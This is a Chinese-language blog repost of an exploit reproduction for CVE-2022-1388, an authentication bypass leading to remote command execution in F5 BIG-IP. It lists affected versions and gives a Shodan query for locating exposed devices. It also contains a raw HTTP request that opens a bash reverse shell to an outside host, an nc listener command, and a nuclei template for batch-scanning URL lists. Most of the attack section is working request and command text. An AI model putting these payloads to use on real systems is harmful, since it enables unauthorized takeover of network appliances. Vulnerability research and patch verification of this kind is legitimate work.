CVE-2022-1388 F5 BIG-IP RCE,网络安全爱好者中心-神域博客网

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现 CVE-2022-1388 F5 BIG-IP RCE

0x01 阅读须知

资源来源于网络，安全小天地只是再次进行分享，使用请遵循本站的免责申明

0x02 漏洞描述

F5官网发布安全公告，披露F5 BIG-IP存在一处远程代码执行漏洞（CVE-2022-1388）。漏洞存在于iControl REST组件中，未经身份验证的攻击者可以发送请求绕过BIG-IP中的iControl REST认证，进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。

0x03 漏洞复现

漏洞影响:

BIG-IP 16.x: 16.1.0 – 16.1.2
BIG-IP 15.x: 15.1.0 – 15.1.5
BIG-IP 14.x: 14.1.0 – 14.1.4
BIG-IP 13.x: 13.1.0 – 13.1.4
BIG-IP 12.x: 12.1.0 – 12.1.6
BIG-IP 11.x: 11.6.1 – 11.6.5
shodan:http.title:”BIG-IP®-+Redirect” +”Server”

1.执行反弹shell命令

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=

{\"command\":\"run\",
\"utilCmdArgs\":\"-c \'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1\'\"}

3. nc监听得到shell

nc -lnvp 7777

4.使用nuclei批量验证1.txt文件中的url是否存在该漏洞，显示存在漏洞。（nuclei稳定快，编写poc简单，有社区维护，推荐使用）

nuclei下载地址：https://github.com/projectdiscovery/nuclei


批量验证命令：
nuclei -list 1.txt -t CVE-2022-1388.yaml

yaml POC：
id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker
    with network access to the BIG-IP system through the management
    port and/or self IP addresses to execute arbitrary system commands,
    create or delete files, or disable services. There is no data plane
    exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve

variables:
  auth: \"admin:\"

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        {
          \"command\": \"run\",
          \"utilCmdArgs\": \"-c \'echo ryaqkj\'\"
        }

    matchers:
      - type: word
        words:
          - \"commandResult\"
          - \"ryaqkj\"
        condition: and

------本文已结束，感谢您的阅读------

THE END